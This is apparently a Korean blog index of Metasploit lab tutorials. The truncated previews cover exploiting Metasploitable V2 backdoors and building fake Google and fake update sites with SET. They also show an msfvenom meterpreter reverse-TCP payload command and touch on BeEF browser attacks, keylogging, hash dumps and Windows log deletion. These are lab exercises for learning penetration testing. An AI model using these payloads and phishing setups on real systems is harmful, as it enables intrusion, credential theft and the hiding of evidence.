본문 바로가기

Learning/└◆Metasploit

MSF 관련 명령어 정리 (정리) MSF(Metasploit Framework) -> 모의해킹 SEtoolkit -> SET(Social Engineering Tech) Fake site 제작, SE Attack 등.. MSF로 할수 없는 것들 보유. Beef-xss -> 브라우저 관련 해킹 연속해서 사용 DNS/ARP Spoofing(전초작업) + msfconsole, armitage + SE attack - setoolkit + xss ataack, Broswer hackking -> BeFF (주의) 다음 문서는 칼리리눅스 1.0/1.1 버전을 기준으로 만들어 졌습니다.리스트 선택 따라서, 칼리리눅스 2.0 버전에서는 변형되었거나 혹은 사라진 명령어도 존재합니다. MSF 관련 명령어 정리 ■ msfconsole 명령어 # .. 더보기
Metasploitable V2 Linux 서버의 취약점(Ingreslock) (7) 버그를 공격하는 경우(Backdoor 존재하는 경우) ■ 실습 시스템 - KaliLinux (EX: attacker system) - Metasploitable V2 Linux (EX: victim system) ■ 공격의 개요 Ingreslock backdoor Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server 1524번 포트는 Ingre 데이터 베이스 Lock 서비스용 포트이다. 이 포트는 512 ■ 취약점 .. 더보기
Metasploitable V2 Linux 서버의 취약점(RMI) (7) 버그를 공격하는 경우(RMI 취약점 존재) ■ 실습 시스템 - KaliLinux (EX: attacker system) - Metasploitable V2 Linux (EX: victim system) RMI (Remote Method Invocation) ; 원격 메쏘드 호출 ■ 출처: www.terms.co.kr RMI (Remote Method Invocation) ; 원격 메쏘드 호출 RMI는 자바 프로그래밍 언어와 개발환경을 사용하여 서로 다른 컴퓨터들 상에 있는 객체들이 분산 네트웍 내에서 상호 작용하는 객체지향형 프로그램을 작성할 수 있는 방식이다. RMI는 일반적으로 RPC라고 알려져 있는 것의 자바 버전이지만, 그러나 요청과 함께 하나 이상의 객체들을 통과시키는 능력을 가지고 있다.. 더보기
Metasploitable V2 Linux 서버의 취약점(distccd,samba) (5) 버그를 공격하는 경우(Backdoor 존재하는 취약점) ■ 실습 시스템 - KaliLinux (EX: attacker system) - Metasploitable V2 Linux (EX: victim system) ■ 공격의 개요 Security weakness to execute arbitrary commands on any system running distccd. distccd - 다중 컴파일 프로그램 ■ 취약점 공격 과정(distccd Backdoor 존재하는 취약점) (KaliLinux) ① distccd 데몬 확인 # nmap -p 3632 192.168.10.134 Starting Nmap 7.01 ( https://nmap.org ) at 2016-04-01 19:20 KST Nma.. 더보기
Metasploitable V2 Linux 서버의 취약점(IRC) (4) 버그를 공격하는 경우(Backdoor 존재하는 취약점) ■ 실습 시스템 - KaliLinux (EX: attacker system) - Metasploitable V2 Linux (EX: victim system) ■ 공격의 개요 What UnrealRCd? UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new features have been added and modified, i.. 더보기
Metasploitable V2 Linux 서버의 취약점(Backdoor) (3) 버그를 공격하는 경우(Backdoor 존재하는 취약점) ■ 실습 시스템 - linux200 (EX: attacker system) - KaliLinux(EX: attacker system) - Metasploitable V2 Linux (EX: victim system) ■ 공격의 개요 Meta V2는 오픈소스이다. (해커의 원본파일 손상 및 재배포) VSFTPD BUG If a username is sent that ends in the sequence ":)" [ a happy face ], the backdoored version will open a listening shell on port 6200. ■ 취약점 공격 과정(Backdoor 존재하는 취약점) (linux200) ① vsftp.. 더보기
Metasploitable V2 Linux 서버의 취약점(NFS) (2) 버그를 공격하는 경우(NFS 전체 공유의 취약점)잘못된 NFS 설정을 공격하는 경우 ■ 실습 시스템- linux200 (EX: attacker system)- Metasploitable V2 Linux (EX: victim system) ■ 공격의 개요This is about as easy as it gets. The next service we should look at is the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. The example below using rpcinfo to identify NFS a.. 더보기
Metasploitable V2 Linux 서버의 취약점(rhosts) Metasploitable V2 Linux 서버는 많은 버그를 가지고 있습니다. 다음은 버그 실습에 대한 예제입니다. 단순히 참고용으로만 사용하시기 바랍니다. Metasploitable V2 Linux 서버의 취약점에 대해서 (1) 버그를 공격하는 경우(rCMD(~/.rhosts) 취약점) ■ 실습 시스템 - linux200 (EX: attacker system) - Metasploitable V2 Linux (EX: victim system) ■ 공격의 개요 TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhos.. 더보기
metasploit 20. DNS + ARP Spoofing + Fake Web site ***************************************************************************************[실습] Fake Site 구성(제한 시간: 30분) DNS Spoofing/Arp Spoofing : ettercap+Fake Web Site : SETookit(실습2)+문자메세지/메일 보내기: SETookit (실습 시스템)Victim system : windows 7(192.168.20.202)Attack system : KaliLinux(192.168.20.50)Router : firewall.example.com(192.168.20.100) (windows 7 system) 결과 확인http://www.google.com -> http://.. 더보기
metasploit 19. Fake Update Site 구축 [추가적인 실습] ■ Fake Update Site 구축 (KaliLinux) ① 클라이언트에 설치할 payload 생성[TERM1] 첫번째 터미널# cd /var/www/html # msfvenom \-p windows/meterpreter/reverse_tcp LHOST=192.168.20.50 LPORT=4444 \-f exe \-o payload.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPay.. 더보기
metasploit 18. BeFF + MSF 브라우저 해킹 원격 쉘 얻기 [추가적인 실습] - 2015년 12월30일 현재 정상적으로 실습이 되지 않는다. BeFF + MSF = 통합BeEF와 MSF 사용하여 브라우저 해킹을 시도하고 원격 쉘을 얻는 과정을 이해해 보자. ■ 사용시스템- KaliLinux- Windows 7(Chrome 브라우저 사용) (windows 7) ■ 점검사항윈도우7 방화벽 설정을 내린다.Java 보안 설정에 192.168.20.50192.168.20.50:8080 사이트를 신뢰할 수 있는 사이트로 등록한다. (kaliLinux) ① BeEF 설정 점검 및 필요하면 변경[TERM1] 첫번째 터미널# vi /usr/share/beef-xss/config.yaml ..... (중략) ...../metasploit 더보기
metasploit 17. 웹 브라우저 해킹 BeFF [실습] 칼리 리눅스 사용하기(웹 브라우저 해킹) WEB Attack : XSS(Cross Side Script)BeEF(비프) XSS 프레임워크: 사용자 권한 획득 BeEF(Browser Exploit Framwork) 사용자 웹 브라우저로 웹페이지를 읽을 때 자바 스크립트 형태로 동작하며, 사용자 PC의 정보 수집 부터 메타 스플로잇 모듈을 이용한 광범위한 공격까지 가능한 도구이다. XSS(Cross Side Script) 취약점웹에서 사용하는 클라이언트 스크립트인 자바스크립트, VB 스크립트, CSS, 에이젝스(Ajax)등을 통해 스크립트에 접근한 사용자들에게 특정한 액션을 일으키게 하는 것을 의미한다.특정한 액셕이라는 것은 악성 코드 유포나, 윔, 바이러스 배포등이 보통의 목적이다. 또한 사용자 .. 더보기
metasploit 16. Java Applet Attack SE Tool Kit 실행(Fake Google WEB Site 구성) - Java Applet Attack(악성 프로그램 유포)(KarlLinux)# setoolkit Select from the menu: 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing 3) Third Party Modules 4) Update the Metasploit Framework 5) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1 Select from the menu:.. 더보기
metasploit 15. SET(Social Engineering Tech.) SET(Social Engineering Tech.) ■ 사용시스템- Kali Linux- Windows 7 패스트 트랙(Fasttrack): 자동 공격 도구메타스포로잇 모듈을 사용한다. 이 도구는 메타스포로잇에 기반을 두고 있고 공격 기법 중 하나인 Autopwn 공격은 내장되어 있는 기능 중 엔맵(nmap)을 통해 네트워크 스캐닝 작업을 하여 대상 시스템을 검색하고, 그에 대한 운영체제, 포트, IP 주소를 분석하며 그에 해당하는 모든 취약점을 자동화 스크립트로 공격한다.칼리리눅스에서는 SET(사회 공학 기법)에 통합되었다. SET(Social Engineering Tech., 사회 공학적 공격 기법)사회공학이란 컴퓨터 보안에서 인간 상호작용의 깊은 신뢰를 바탕으로 사람들을 속여 정상 보안 절차를 깨.. 더보기
metasploit 14. 윈도우즈 환경에서 Metasploit 다운로드 [실습] 윈도우즈 환경에서 Metasploit 다운로드 하여 운영하는 방법윈도우즈(window2008)에 Metasploit 다운로드 하고 설치해 보자. MSF interface : (ㄱ) (TUI) console(msfconsole CMD) (ㄴ) (TUI) CMD(msfcli CMD) (ㄷ) (GUI) Armitage, msfgui, msfweb Armitage 도구와 msfguiArmitage는 Raphael Mudge가 개발한 GUI 기반을 둔 도구로 자동 공격 도구(점검 도구)인 메타스플로잇의 도구 중 하나로 포함돼 있다.스캔을 통해 해당 서비스에 적합한 공격을 골라내 선택할 수 있고, 옵션들도 자동으로 입력되기 때문에 점검자 입장에서는 많은 고민을 하지 않아도 되는 아주 편리한 도구이다. Ar.. 더보기
metasploit 13. 메타스플로잇 업데이트(msfupdate CMD) [실습] 메타스플로잇 업데이트(msfupdate CMD) 이 작업은 진행하지 않는다. -> 시간이 오래 걸린다. 만약 이 작업을 진행한다면 OS snapshot을 뜨고 작업한다.-> 나중에 에러 생기는 경우를 대비한다. (업데이트 하다가 문제가 발생경우가 많이 있다.) msfupdate 명령어를 통해 업데이트 하는 경우 metasploit-framework 관련 된 파일이 not found 에러메세지를 발생하면서 실행이 되지 않는다면 아래와 같은 절차를 통해 업데이트가 가능하다. ■ (2016년 01월06일 : KaliLinux 2.0 - kali scna repository 사용하는 경우) (ㄱ) 미러 사이트 확인 # curl –sI http://http.kali.org/README (ㄴ) /etc/a.. 더보기
metasploit 12. password the hash(hash dump) [실습] password the hash(hash dump) ■ 사용시스템 - KaliLinux - windows 2008 (windows 2008) (선수작업) 윈도우 2008 사용자 (EX: soldesk)의 암호를 쉬운 암호로 변경한다. (기존 암호) ==> (새로운 암호) 123 시작 > 관리도구 > 로컬 보안 정책 보안 설정 > 계정 정책 > 암호 정책 > "암호는 복잡성을 만족해야 함" 부분이 "사용 안 함"으로 설정 되어 있는지 확인 시작 > 관리도구 > 컴퓨터 관리 > 로컬 사용자 및 그룹 > 사용자 > soldesk 사용자를 선택하고 오른쪽 마우스를 클릭 암호 설정 > 계속 > 새암호(EX: 123) (KaliLinux) # netstat -an | grep :5432 # service .. 더보기
metasploit 11. 키보드 스니핑과 스크린샷 [실습] 키보드 스니핑과 스크린샷 ■ 사용 시스템- KaliLinux- Windows 2008 meterpreter의 getdesktop과 키 스니핑에 대해서 테스트해 보자.관련 명령어들 enumdesktops 접근 가능한 테스크톱과 윈도우 스테이션 전체 목록을 확인 getdesktop 현재 meterpreter 세션으로 작업하고 있는 사용자 시스템의 현재 테스크 톱 확인 setdesktop 현재 meterpreter 세션 테스크톱에서 다른 데스크톱 스테이션으로 변경 keyscan_start 현재 작업 중인 스테이션에서 키보드 스니퍼(가로채기)를 시작 keyscan_stop 현재 작업 중인 스테이션에서 키보드 스니퍼(가로채기)를 종료 keyscan_dump meterpreter 데스크톱 세션의 키보드 동.. 더보기
metasploit 10. 윈도우 2008 로그 삭제 [실습] 윈도우 2008 로그 삭제 ■ 사용 시스템- Windows 2008- KaliLinux ① 윈도우 2008에서 로그를 확인(window 2008) 로그 확인 작업시작 > 관리도구 > 이벤트 뷰어 > Windows 로그 > (응용프로그램|보안|Setup|시스템)log를 마음대로 지우고 수정할 수 있다. ② 칼리리눅스에서 연결된 세션의 윈도우 2008 운영체제 사용자 권한 상승 및 로그 지우기(Kali Linux)# cd /root/bin # vi reverse_resource2.rc 새로운 프로그램 제작 use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 192.168.20.50set ExitSessio.. 더보기
metasploit 09. meterpreter를 이용한 윈도우즈 시스템 장악 [실습] 메타스플로잇을 사용하여 윈도우즈 시스템 장악(meterpreter를 이용한 Reverse TCP 공격) 이전 실습 중 아래 프로그램을 사용 했었다. (쉘을 통해서 사용하는 방식)java/shell/bind_tcpjava/shell/reverse_tcp 다음은 shell이 아닌 meterpreter 방식 (명령어를 수행하는 방식, 커넥션이 이루어진 이후 meterpreter수행)java/meterpreter/bind_tcpjava/meterpreter/reverce_tcp운영체제의 버전 마다 사용하는 명령어가 각 다르기 때문에 meterpreter에서 해당 운영체제의 명령어로전환하여 사용할 수 있다. ■ 사용시스템 - KaliLinux- windows 7 메타스플로잇의 메터프리터(Meterpret.. 더보기